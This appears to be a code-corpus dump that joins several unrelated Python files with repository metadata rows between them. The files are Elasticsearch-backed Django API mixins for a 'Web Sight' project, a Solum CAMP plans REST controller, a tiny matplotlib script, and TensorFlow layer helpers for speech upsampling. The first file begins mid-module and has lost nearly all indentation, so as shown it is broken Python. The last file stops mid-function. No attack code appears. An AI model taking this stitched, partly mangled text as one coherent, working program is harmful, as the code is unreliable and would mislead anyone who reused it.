# Class Methods
@classmethod
def get_db_model_class(cls):
"""
Get the database model class that this APIView is meant to query against.
:return: The database model class that this APIView is meant to query against.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
def _check_permissions(self):
return self._check_db_object_permissions()
def _check_db_object_permissions(self):
"""
Check to see if the requesting user has sufficient permissions to be querying self.db_object.
:return: True if the requesting user has sufficient permissions to be querying self.db_object, False
otherwise.
"""
raise NotImplementedError("Subclasses must implement this!")
# Private Methods
def __get_db_object(self):
"""
Get the database object that the queried Elasticsearch data should be tied to.
:return: The database object that the queried Elasticsearch data should be tied to.
"""
to_return = get_object_or_404(self.db_model_class, pk=self.kwargs["pk"])
return to_return
# Properties
@property
def db_object(self):
"""
Get the database object that the queried Elasticsearch data should be tied to.
:return: the database object that the queried Elasticsearch data should be tied to.
"""
if self._db_object is None:
self._db_object = self.__get_db_object()
return self._db_object
@property
def db_model_class(self):
"""
Get the database model class that this APIView is meant to query against.
:return: The database model class that this APIView is meant to query against.
"""
return self.__class__.get_db_model_class()
@property
def filter_by_parent_db_object(self):
"""
Get whether or not Elasticsearch results should be filtered upon based on the mapped database object.
:return: whether or not Elasticsearch results should be filtered upon based on the mapped database object.
"""
return self._filter_by_parent_db_object
# Representation and Comparison
class BaseElasticsearchSingleMappedAPIViewMixin(BaseElasticsearchMappedAPIViewMixin):
"""
This is a base mixin class for all Web Sight APIView classes that query single instances of
Elasticsearch models that are in turn paired with database models.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def _extract_contents_from_response(self, response):
if response.results_count > 1:
raise TooManyEsResultsError(
"Total of %s results retrieved in call to %s."
% (response.results_count, self.__class__.__name__)
)
elif response.results_count == 0:
raise Http404
else:
return self._get_object_from_result(response.results[0])
# Protected Methods
# Private Methods
# Properties
# Representation and Comparison
class BaseElasticsearchFilterableMappedAPIViewMixin(BaseElasticsearchMappedAPIViewMixin):
"""
This is a base mixin class for Elasticsearch query classes that enable clients to filter results of
the Elasticsearch query.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def get(self, *args, **kwargs):
to_return = super(BaseElasticsearchFilterableMappedAPIViewMixin, self).get(*args, **kwargs)
to_return.data["filter_fields"] = self.filter_fields
return to_return
# Protected Methods
def _apply_filters_to_query(self, query):
query = super(BaseElasticsearchFilterableMappedAPIViewMixin, self)._apply_filters_to_query(query)
query = self.__apply_query_string_filters(query)
return query
# Private Methods
def __apply_query_string_filters(self, query):
"""
Apply filters to the given query based on the contents of the query string in self.request.
:param query: The query to add filters to.
:return: The query with filters added.
"""
for filter_key in self.hard_filterable_fields:
if filter_key in self.request.query_params:
filter_value = self.request.query_params.get(filter_key)
query.must_by_term(key=filter_key, value=filter_value, verify_key=True, include=True)
elif "-%s" % (filter_key,) in self.request.query_params:
filter_value = self.request.query_params.get("-%s" % (filter_key,))
query.must_by_term(key=filter_key, value=filter_value, verify_key=True, include=False)
for filter_key in self.soft_filterable_fields:
if filter_key in self.request.query_params:
filter_value = self.request.query_params.get(filter_key)
query.must_by_term(key=filter_key, value=filter_value, verify_key=False, include=True)
elif "-%s" % (filter_key,) in self.request.query_params:
filter_value = self.request.query_params.get("-%s" % (filter_key,))
query.must_by_term(key=filter_key, value=filter_value, verify_key=False, include=False)
if self.has_search_argument:
query.set_search_term(term=self.search_argument, field="_all")
return query
# Properties
@property
def filter_fields(self):
"""
Get a list of the fields that the Elasticsearch model referenced by this
view can be filtered on.
:return: a list of the fields that the Elasticsearch model referenced by
this view can be filtered on.
"""
return self.soft_filterable_fields + self.hard_filterable_fields
@property
def hard_filterable_fields(self):
"""
Get a list of strings representing the fields that are explicitly declared on the
queried Elasticsearch model that can be filtered against.
:return: a list of strings representing the fields that are explicitly declared on
the queried Elasticsearch model that can be filtered against.
"""
return self.queryable_model_fields
@property
def has_search_argument(self):
"""
Get whether or not the request has a search argument.
:return: whether or not the request has a search argument.
"""
return settings.SEARCH_PARAM in self.request.query_params
@property
def search_argument(self):
"""
Get the search argument from the request query string.
:return: the search argument from the request query string.
"""
if self._search_argument is None:
self._search_argument = self.request.query_params.get(settings.SEARCH_PARAM, "")
return self._search_argument
@property
def soft_filterable_fields(self):
"""
Get a list of strings representing the fields that are not explicitly declared on
the queried Elasticsearch model that can be filtered against.
:return: A list of strings representing the fields that are not explicitly declared
on the queried Elasticsearch model that can be filtered against.
"""
return []
# Representation and Comparison
class BaseElasticsearchAnalyticsAPIViewMixin(BaseElasticsearchFilterableMappedAPIViewMixin):
"""
This is a base mixin class for all Web Sight APIView classes that query Elasticsearch to retrieve
analytical data about models.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
# Public Methods
# Protected Methods
def _apply_aggregates_to_query(self, query):
"""
Apply the necessary aggregates to the given query and return it.
:param query: The query to add aggregates to.
:return: The query with the added aggregates.
"""
raise NotImplementedError("Subclasses must implement this!")
def _extract_contents_from_response(self, response):
to_return = {}
for aggregate_name, aggregate in self.query.aggregates.iteritems():
to_return[aggregate_name] = aggregate.unpack_response(response.aggregations[aggregate_name])
return to_return
def _query_elasticsearch(self):
es_index = self._get_elasticsearch_index()
self._query = self.es_query_class(suppress_source=True)
self._query = self._apply_filters_to_query(self._query)
self._query = self._apply_aggregates_to_query(self._query)
return self._query.search(index=es_index)
# Private Methods
# Properties
# Representation and Comparison
class BaseElasticsearchManyMappedAPIViewMixin(BaseElasticsearchFilterableMappedAPIViewMixin):
"""
This is a base mixin class for all Web Sight APIView classes that query Elasticsearch models that are paired
with database models and that return multiple instances of the queried model.
"""
# Class Members
_current_page = None
_page_offset = None
_sort_argument = None
_export_argument = None
_exporter_map = None
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def get(self, *args, **kwargs):
"""
Handle the HTTP GET request to this APIView.
:param args: Positional arguments.
:param kwargs: Keyword arguments.
:return: A Django rest framework response object.
"""
if not self.has_export_argument:
to_return = super(BaseElasticsearchManyMappedAPIViewMixin, self).get(*args, **kwargs)
to_return.data["sortable_fields"] = self.sortable_fields
return to_return
else:
self.check_ws_permissions()
query_results = self._query_elasticsearch()
return self.exporter_map[self.export_argument].get_django_response_from_elasticsearch_response(query_results)
# Protected Methods
def _get_elasticsearch_query(self):
to_return = super(BaseElasticsearchManyMappedAPIViewMixin, self)._get_elasticsearch_query()
if self.has_export_argument:
self.__validate_export_value()
to_return.offset = 0
to_return.size = config.es_max_query_size
else:
to_return.offset = self.page_offset
to_return.size = self.page_size
if self.has_sort_argument:
self.__validate_sort_field()
to_return.add_sort_field(field_name=self.sort_field, direction=self.sort_direction)
return to_return
def _extract_contents_from_response(self, response):
results = self._extract_objects_from_response(response)
to_return = PaginationSerializer(
results=results,
count=response.results_count,
current_page=self.current_page,
)
return to_return.to_response_dict()
# Private Methods
def __get_current_page(self):
"""
Get an integer representing the current page if a page number was supplied in the request.
:return: An integer representing the current page if a page number was supplied in the request.
"""
page_number = self.request.query_params.get(settings.PAGINATION_PARAM, 1)
to_return = int(page_number) if ValidationHelper.is_int(page_number) else 1
return max(to_return, 1)
def __validate_export_value(self):
"""
Ensure that the value in self.export_argument is a valid string to export via.
:return: None
"""
ValidationHelper.validate_in(to_check=self.export_argument, contained_by=self.exporter_map_keys)
def __validate_sort_field(self):
"""
Ensure that the field in self.sort_field is a valid field to be sorted upon.
:return: None
"""
ValidationHelper.validate_in(to_check=self.sort_field, contained_by=self.sortable_fields)
# Properties
@property
def current_page(self):
"""
Get the current requested page number
:return: the current requested page number
"""
if self._current_page is None:
self._current_page = self.__get_current_page()
return self._current_page
@property
def export_argument(self):
"""
Get the export argument from the request's query string.
:return: the export argument from the request's query string.
"""
if self._export_argument is None:
self._export_argument = self.request.query_params.get(settings.EXPORT_PARAM, "")
return self._export_argument
@property
def exporter_map(self):
"""
Get a dictionary that maps export types to the classes that can handle exporting data to a file
of the given type.
:return: A dictionary that maps export types to the classes that can handle exporting data to a file
of the given type.
"""
if self._exporter_map is None:
self._exporter_map = get_export_type_wrapper_map()
return self._exporter_map
@property
def exporter_map_keys(self):
"""
Get a list of strings representing the valid export types supported by Web Sight.
:return: a list of strings representing the valid export types supported by Web Sight.
"""
return self.exporter_map.keys()
@property
def has_export_argument(self):
"""
Get whether or not the request has an export argument.
:return: whether or not the request has an export argument.
"""
return settings.EXPORT_PARAM in self.request.query_params
@property
def has_sort_argument(self):
"""
Get whether or not the request has a sorting argument.
:return: whether or not the request has a sorting argument.
"""
return api_settings.ORDERING_PARAM in self.request.query_params
@property
def page_offset(self):
"""
Get the page offset to use when querying Elasticsearch.
:return: the page offset to use when querying Elasticsearch.
"""
if self._page_offset is None:
self._page_offset = (self.current_page - 1) * self.page_size
return self._page_offset
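    # Worked example (values are illustrative; assumes PAGINATION_PARAM is
    # "page"): with api_settings.PAGE_SIZE == 20 and a request for ?page=3,
    # current_page is 3, so page_offset == (3 - 1) * 20 == 40 and the
    # Elasticsearch query is issued with offset=40, size=20.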
@property
def page_size(self):
"""
Get the page size to use.
:return: the page size to use.
"""
return api_settings.PAGE_SIZE
@property
def sortable_fields(self):
"""
Get a list of the fields that this query allows sorting on.
:return: a list of the fields that this query allows sorting on.
"""
return self.queryable_model_fields
@property
def sort_argument(self):
"""
Get the sort argument from the request query string.
:return: the sort argument from the request query string.
"""
if self._sort_argument is None:
self._sort_argument = self.request.query_params.get(api_settings.ORDERING_PARAM, "")
return self._sort_argument
@property
def sort_direction(self):
"""
Get a string representing the direction that results should be ordered in.
:return: a string representing the direction that results should be ordered in.
"""
        to_return = "desc" if self.sort_argument.startswith("-") else "asc"
        return to_return
@property
def sort_field(self):
"""
Get the field to sort query results on.
:return: The field to sort query results on.
"""
return self.sort_argument[1:] if self.sort_argument.startswith("-") else self.sort_argument
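    # Illustrative sketch (hypothetical request, assuming ORDERING_PARAM is
    # "ordering"): a query string of ?ordering=-created gives
    # sort_argument == "-created", sort_field == "created" and
    # sort_direction == "desc"; ?ordering=created sorts ascending.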
# Representation and Comparison
class BaseElasticsearchRelatedAPIViewMixin(BaseElasticsearchManyMappedAPIViewMixin):
"""
This is a base Elasticsearch APIView mixin that allows users to query data based on multidoc queries
that span multiple document types.
"""
# Class Members
_filter_by_parent_db_object = False
# Instantiation
# Static Methods
# Class Methods
# Public Methods
def _apply_filters_to_query(self, query):
query = super(BaseElasticsearchRelatedAPIViewMixin, self)._apply_filters_to_query(query)
filter_value = self._get_related_filter_value()
if filter_value is None:
raise ObjectDoesNotExist()
query.must_by_term(key=self.related_filter_key, value=filter_value)
return query
def _get_related_filter_value(self):
"""
Get the value that the Elasticsearch query should filter on to ensure results are related
to the relevant document.
:return: The value that the Elasticsearch query should filter on to ensure results are related
to the relevant document. If this method returns None, then a 404 will be raised.
"""
raise NotImplementedError("Subclasses must implement this!")
# Protected Methods
# Private Methods
# Properties
@property
def queryable_model_fields(self):
return self.es_query_class.get_queryable_fields()
@property
def related_filter_key(self):
"""
Get the key that the Elasticsearch query should be filtered on to ensure results are related to the
relevant document.
:return: the key that the Elasticsearch query should be filtered on to ensure results are related
to the relevant document.
"""
raise NotImplementedError("Subclasses must implement this!")
# Representation and Comparison
class BaseEsMixin(object):
"""
This is a base class for Elasticsearch mixin classes.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_es_query_class(cls):
"""
Get the Elasticsearch query class that this APIView is meant to query.
:return: The Elasticsearch query class that this APIView is meant to query.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
# Private Methods
# Properties
# Representation and Comparison
class BaseRelatedEsMixin(BaseEsMixin):
"""
This is a base class for Elasticsearch mixin classes that rely on multidoc queries.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_related_es_query_class(cls):
"""
Get the Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
:return: The Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
def _apply_related_elasticsearch_query_filters(self, query):
"""
Apply filters to the given query to restrict results to only those that match the Elasticsearch
document that is related to data returned by this APIView.
:param query: The query to apply filters to.
:return: The query with filters applied.
"""
query.must_by_term(key=self.mapped_elasticsearch_key, value=self.mapped_elasticsearch_value)
return query
def _get_related_filter_value(self):
"""
Get the value that the Elasticsearch query should filter on to ensure results are related
to the relevant document.
:return: The value that the Elasticsearch query should filter on to ensure results are related
to the relevant document. If this method returns None, then a 404 will be raised.
"""
query = self.related_elasticsearch_query_class()
query = self._apply_related_elasticsearch_query_filters(query)
query.queryable_model_fields = [self.parent_related_value_key]
result = query.search(self._get_elasticsearch_index())
if result.results_count == 0:
return None
        if result.results_count > 1:
logger.warning(
"Too many results returned in APIView %s (%s returned)."
% (self.__class__.__name__, result.results_count)
)
return result.results[0]["_source"][self.parent_related_value_key]
# Private Methods
# Properties
@property
def parent_related_value_key(self):
"""
Get a string representing the key contained in the parent Elasticsearch document that the relationship
should be based upon.
:return: a string representing the key contained in the parent Elasticsearch document that the
relationship should be based upon.
"""
raise NotImplementedError("Subclasses must implement this!")
@property
def related_filter_key(self):
"""
Get the key that the Elasticsearch query should be filtered on to ensure results are related to the
relevant document.
:return: the key that the Elasticsearch query should be filtered on to ensure results are related
to the relevant document.
"""
raise NotImplementedError("Subclasses must implement this!")
@property
def related_elasticsearch_query_class(self):
"""
Get the Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
:return: The Elasticsearch query class that this related Elasticsearch mixin will retrieve
data from.
"""
return self.__class__.get_related_es_query_class()
# Representation and Comparison
class BaseDbMixin(object):
"""
This is a base class for database mixin classes.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_db_model_class(cls):
"""
Get the database model class that this APIView is meant to query against.
:return: The database model class that this APIView is meant to query against.
"""
raise NotImplementedError("Subclasses must implement this!")
# Public Methods
# Protected Methods
def _apply_filters_to_query(self, query):
query = super(BaseDbMixin, self)._apply_filters_to_query(query)
if self.filter_by_parent_db_object:
return self._apply_parent_db_object_filter(query)
else:
return query
def _apply_parent_db_object_filter(self, query):
"""
Apply a filter to the given Elasticsearch query that restricts results to only those objects
that are related to the parent database object.
:param query: The query to apply filters to.
:return: The query with filters applied.
"""
query.must_by_term(key=self.mapped_elasticsearch_key, value=self.mapped_elasticsearch_value)
return query
def _check_db_object_permissions(self):
"""
Check to see if the requesting user has sufficient permissions to be querying self.db_object.
:return: True if the requesting user has sufficient permissions to be querying self.db_object, False
otherwise.
"""
raise NotImplementedError("Subclasses must implement this!")
def _get_elasticsearch_index(self):
"""
Get the Elasticsearch index that the resulting Elasticsearch query should be restricted to.
:return: The Elasticsearch index that the resulting Elasticsearch query should be restricted to.
"""
raise NotImplementedError("Subclasses must implement this!")
# Private Methods
# Properties
@property
def mapped_elasticsearch_key(self):
"""
Get a string representing the key that the Elasticsearch query should be filtered by when filtering
upon a parent database object.
:return: a string representing the key that the Elasticsearch query should be filtered by when
filtering upon a parent database object.
"""
raise NotImplementedError("Subclasses must implement this!")
@property
def mapped_elasticsearch_value(self):
"""
Get a string representing the value that the Elasticsearch query should be filtered upon when filtering
upon a parent database object.
:return: a string representing the value that the Elasticsearch query should be filtered upon when
filtering upon a parent database object.
"""
return self.db_object.uuid
# Representation and Comparison
| gpl-3.0 | -154,340,441,295,558,980 | 32.977573 | 121 | 0.656494 | false | 4.547943 | false | false | false |
devdattakulkarni/test-solum | solum/api/controllers/camp/v1_1/plans.py | 1 | 9115 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import jsonpatch
from oslo_db import exception as db_exc
import pecan
from pecan import rest
import six
import wsme
from wsme.rest import json as wjson
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from solum.api.controllers.camp.v1_1.datamodel import plans as model
from solum.api.controllers.camp.v1_1 import uris
from solum.api.controllers import common_types
from solum.api.handlers.camp import plan_handler as plan_handler
from solum.common import exception
from solum.common import yamlutils
from solum.openstack.common.gettextutils import _
from solum.openstack.common import log as logging
LOG = logging.getLogger(__name__)
MAL_PATCH_ERR = 'JSON Patch request missing one or more required components'
UNSUP_VER_ERR = 'camp_version \'%s\' is not supported by this implementation'
def clean_plan(plan_dict):
del plan_dict['camp_version']
return plan_dict
def fluff_plan(plan_dict, pid):
"""Fluff the plan with a camp_version and uri."""
plan_dict['camp_version'] = "CAMP 1.1"
plan_dict['uri'] = uris.PLAN_URI_STR % (pecan.request.host_url,
pid)
return plan_dict
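# Rough sketch of the clean/fluff round trip (the plan id and contents below
# are invented for illustration only):
#
#   plan_dict = {'name': 'my-plan', 'camp_version': 'CAMP 1.1'}
#   clean_plan(plan_dict)            # drops the 'camp_version' key
#   fluff_plan(plan_dict, 'abc123')  # restores 'camp_version' and sets
#                                    # 'uri' from uris.PLAN_URI_STR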
class JsonPatchProcessingException(exception.SolumException):
msg_fmt = _("Error while processing the JSON Patch document: %(reason)s")
code = 500
class PlansController(rest.RestController):
"""CAMP v1.1 plans controller."""
_custom_actions = {
'patch': ['PATCH']
}
@exception.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(None, wtypes.text, status_code=204)
def delete(self, uuid):
"""Delete this plan."""
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
try:
handler.delete(uuid)
except (db_exc.DBReferenceError, db_exc.DBError):
raise exception.PlanStillReferenced(name=uuid)
@exception.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(model.Plan, wtypes.text)
def get_one(self, uuid):
"""Return the appropriate CAMP-style plan resource."""
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
db_obj = handler.get(uuid)
plan_dict = fluff_plan(db_obj.refined_content(), db_obj.uuid)
return model.Plan(**plan_dict)
@exception.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(model.Plans)
def get(self):
puri = uris.PLANS_URI_STR % pecan.request.host_url
pdef_uri = uris.DEPLOY_PARAMS_URI % pecan.request.host_url
desc = "Solum CAMP API plans collection resource."
handler = plan_handler.PlanHandler(pecan.request.security_context)
plan_objs = handler.get_all()
p_links = []
for m in plan_objs:
p_links.append(common_types.Link(href=uris.PLAN_URI_STR %
(pecan.request.host_url, m.uuid),
target_name=m.name))
# if there aren't any plans, avoid returning a resource with an
# empty plan_links array
if len(p_links) > 0:
res = model.Plans(uri=puri,
name='Solum_CAMP_plans',
type='plans',
description=desc,
parameter_definitions_uri=pdef_uri,
plan_links=p_links)
else:
res = model.Plans(uri=puri,
name='Solum_CAMP_plans',
type='plans',
description=desc,
parameter_definitions_uri=pdef_uri)
return res
@exception.wrap_pecan_controller_exception
@pecan.expose('json', content_type='application/json-patch+json')
def patch(self, uuid):
"""Patch an existing CAMP-style plan."""
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
plan_obj = handler.get(uuid)
# TODO([email protected]) check if there are any assemblies that
        # refer to this plan and raise a PlanStillReferenced exception if
# there are.
if not pecan.request.body or len(pecan.request.body) < 1:
raise exception.BadRequest(reason='empty request body')
# check to make sure the request has the right Content-Type
if (pecan.request.content_type is None or
pecan.request.content_type != 'application/json-patch+json'):
raise exception.UnsupportedMediaType(
name=pecan.request.content_type,
method='PATCH')
try:
patch = jsonpatch.JsonPatch.from_string(pecan.request.body)
patched_obj = patch.apply(plan_obj.refined_content())
db_obj = handler.update(uuid, patched_obj)
except KeyError:
# a key error indicates one of the patch operations is missing a
# component
raise exception.BadRequest(reason=MAL_PATCH_ERR)
except jsonpatch.JsonPatchConflict:
raise exception.Unprocessable
except jsonpatch.JsonPatchException as jpe:
raise JsonPatchProcessingException(reason=six.text_type(jpe))
return fluff_plan(db_obj.refined_content(), db_obj.uuid)
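    # The request body for the PATCH handler above is a standard JSON Patch
    # (RFC 6902) document sent with Content-Type application/json-patch+json;
    # for example (the field name is illustrative only):
    #
    #   [{"op": "replace", "path": "/description", "value": "updated plan"}]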
@exception.wrap_pecan_controller_exception
@pecan.expose('json', content_type='application/x-yaml')
def post(self):
"""Create a new CAMP-style plan."""
if not pecan.request.body or len(pecan.request.body) < 1:
raise exception.BadRequest
# check to make sure the request has the right Content-Type
if (pecan.request.content_type is None or
pecan.request.content_type != 'application/x-yaml'):
raise exception.UnsupportedMediaType(
name=pecan.request.content_type,
method='POST')
try:
yaml_input_plan = yamlutils.load(pecan.request.body)
except ValueError as excp:
raise exception.BadRequest(reason='Plan is invalid. '
+ six.text_type(excp))
camp_version = yaml_input_plan.get('camp_version')
if camp_version is None:
raise exception.BadRequest(
reason='camp_version attribute is missing from submitted Plan')
elif camp_version != 'CAMP 1.1':
raise exception.BadRequest(reason=UNSUP_VER_ERR % camp_version)
# Use Solum's handler as the point of commonality. We can do this
# because Solum stores plans in the DB in their JSON form.
handler = (plan_handler.
PlanHandler(pecan.request.security_context))
model_plan = model.Plan(**yaml_input_plan)
# Move any inline Service Specifications to the "services" section.
# This avoids an issue where WSME can't properly handle multi-typed
# attributes (e.g. 'fulfillment'). It also smoothes out the primary
# difference between CAMP plans and Solum plans, namely that Solum
# plans don't have inline Service Specifications.
for art in model_plan.artifacts:
if art.requirements != wsme.Unset:
for req in art.requirements:
if (req.fulfillment != wsme.Unset and
isinstance(req.fulfillment,
model.ServiceSpecification)):
s_spec = req.fulfillment
# if the inline service spec doesn't have an id
# generate one
if s_spec.id == wsme.Unset:
s_spec.id = str(uuid.uuid4())
# move the inline service spec to the 'services'
# section
if model_plan.services == wsme.Unset:
model_plan.services = [s_spec]
else:
model_plan.services.append(s_spec)
# set the fulfillment to the service spec id
req.fulfillment = "id:%s" % s_spec.id
db_obj = handler.create(clean_plan(wjson.tojson(model.Plan,
model_plan)))
plan_dict = fluff_plan(db_obj.refined_content(), db_obj.uuid)
pecan.response.status = 201
pecan.response.location = plan_dict['uri']
return plan_dict
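    # Minimal example of a plan document accepted by the POST handler above
    # (attribute values are invented; only camp_version and the
    # application/x-yaml Content-Type are enforced here):
    #
    #   camp_version: CAMP 1.1
    #   name: example-plan
    #   artifacts: []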
| apache-2.0 | 5,306,191,214,696,418,000 | 39.154185 | 79 | 0.602414 | false | 4.052912 | false | false | false |
BTY2684/gitPy-snippets | testProj/main.py | 1 | 1348 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# main.py
#
# Copyright 2014 Yang <yang@Leo-FamilyGuy>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import d3py
import pandas
import numpy as np
import matplotlib.pyplot as plt
import classes as TSs
def main():
obj1 = TSs.Bond()
obj2 = TSs.Stock()
for i in range(10):
obj1.data_add(obj1._datasize, i + 1)
obj2.data_add(obj2._datasize, i - 10)
print (obj1._datadict)
print (obj2._datadict)
plt.bar(obj1._datadict.values(), obj2._datadict.values(), align='center')
plt.xticks(range(len(obj1._datadict)), obj1._datadict.keys())
plt.show()
return 0
if __name__ == '__main__':
main()
| gpl-2.0 | -295,398,262,035,383,740 | 25.431373 | 74 | 0.699555 | false | 3.156909 | false | false | false |
jhetherly/EnglishSpeechUpsampler | models.py | 1 | 20377 | import tensorflow as tf
custom_shuffle_module = tf.load_op_library('src/shuffle_op.so')
shuffle = custom_shuffle_module.shuffle
# ###################
# TENSORBOARD HELPERS
# ###################
def comprehensive_variable_summaries(var):
"""
Attach a lot of summaries to a Tensor (for TensorBoard visualization).
"""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def histogram_variable_summaries(var):
"""
Attach a histogram summary to a Tensor (for TensorBoard visualization).
"""
with tf.name_scope('summaries'):
tf.summary.histogram('histogram', var)
# ###################
# ###################
# ######################
# LAYER HELPER FUNCTIONS
# ######################
def subpixel_reshuffle_1D_impl(X, m):
"""
performs a 1-D subpixel reshuffle of the input 2-D tensor
assumes the last dimension of X is the filter dimension
ref: https://github.com/Tetrachrome/subpixel
"""
return tf.transpose(tf.stack([tf.reshape(x, (-1,)) for x
in tf.split(X, m, axis=1)]))
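# Shape sketch for the helper above (example values are assumed, not taken
# from the original source): for X of shape (T, F) with m evenly dividing F,
# the result has shape (T * F / m, m), i.e. groups of filters are interleaved
# into the time dimension.
#
#   X = tf.cast(tf.reshape(tf.range(12), (3, 4)), tf.float32)  # T=3, F=4
#   Y = subpixel_reshuffle_1D_impl(X, 2)                        # shape (6, 2)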
def subpixel_reshuffle_1D(X, m, name=None):
"""
maps over the batch dimension
"""
return tf.map_fn(lambda x: subpixel_reshuffle_1D_impl(x, m), X, name=name)
def subpixel_restack_impl(X, n_prime, m_prime, name=None):
"""
performs a subpixel restacking such that it restacks columns of a 2-D
tensor onto the rows
"""
bsize = tf.shape(X)[0]
r_n = n_prime - X.get_shape().as_list()[1]
total_new_space = r_n*m_prime
to_stack = tf.slice(X, [0, 0, m_prime], [-1, -1, -1])
to_stack = tf.slice(tf.reshape(to_stack, (bsize, -1)),
[0, 0], [-1, total_new_space])
to_stack = tf.reshape(to_stack, (bsize, -1, m_prime))
to_stack = tf.slice(to_stack, [0, 0, 0], [-1, r_n, -1])
return tf.concat((tf.slice(X, [0, 0, 0], [-1, -1, m_prime]), to_stack),
axis=1, name=name)
def subpixel_restack(X, n_prime, m_prime=None, name=None):
n = X.get_shape().as_list()[1]
m = X.get_shape().as_list()[2]
r_n = n_prime - n
if m_prime is None:
for i in range(1, m):
r_m = i
m_prime = m - r_m
if r_m*n >= m_prime*r_n:
break
return subpixel_restack_impl(X, n_prime, m_prime, name=name)
def batch_norm(T, is_training, scope):
# tf.cond takes nullary functions as its first and second arguments
return tf.cond(is_training,
lambda: tf.contrib.layers.batch_norm(T,
decay=0.99,
# zero_debias_moving_mean=True,
is_training=is_training,
center=True, scale=True,
updates_collections=None,
scope=scope,
reuse=False),
lambda: tf.contrib.layers.batch_norm(T,
decay=0.99,
is_training=is_training,
center=True, scale=True,
updates_collections=None,
scope=scope,
reuse=True))
def weight_variable(shape, name=None):
initial = tf.truncated_normal(shape, mean=0.0, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(shape, name=None):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def conv1d(x, W, stride=1, padding='SAME', name=None):
return tf.nn.conv1d(x, W, stride=stride, padding=padding, name=name)
def build_1d_conv_layer(prev_tensor, prev_conv_depth,
conv_window, conv_depth,
act, layer_number,
stride=1,
padding='SAME',
tensorboard_output=False,
name=None):
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([conv_window,
prev_conv_depth,
conv_depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([conv_depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
conv = conv1d(prev_tensor, W, stride=stride, padding=padding) + b
if tensorboard_output:
histogram_variable_summaries(conv)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
h = act(conv, name=name)
if tensorboard_output:
histogram_variable_summaries(h)
return h
def build_1d_conv_layer_with_res(prev_tensor, prev_conv_depth,
conv_window, conv_depth,
res, act, layer_number,
tensorboard_output=False,
name=None):
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([conv_window,
prev_conv_depth,
conv_depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([conv_depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
conv = conv1d(prev_tensor, W) + b
if tensorboard_output:
histogram_variable_summaries(conv)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
h = act(tf.add(conv, res), name=name)
if tensorboard_output:
histogram_variable_summaries(h)
return h
def build_downsampling_block(input_tensor,
filter_size, stride,
layer_number,
act=tf.nn.relu,
is_training=True,
depth=None,
padding='VALID',
tensorboard_output=False,
name=None):
# assume this layer is twice the depth of the previous layer if no depth
# information is given
if depth is None:
depth = 2*input_tensor.get_shape().as_list()[-1]
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([filter_size,
input_tensor.get_shape().as_list()[-1],
depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
l = tf.nn.conv1d(input_tensor, W, stride=stride,
padding=padding, name=name) + b
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_batch_norm'.format(layer_number)) as scope:
# l = tf.nn.dropout(l, keep_prob=0.25)
l = batch_norm(l, is_training, scope)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
l = act(l, name=name)
if tensorboard_output:
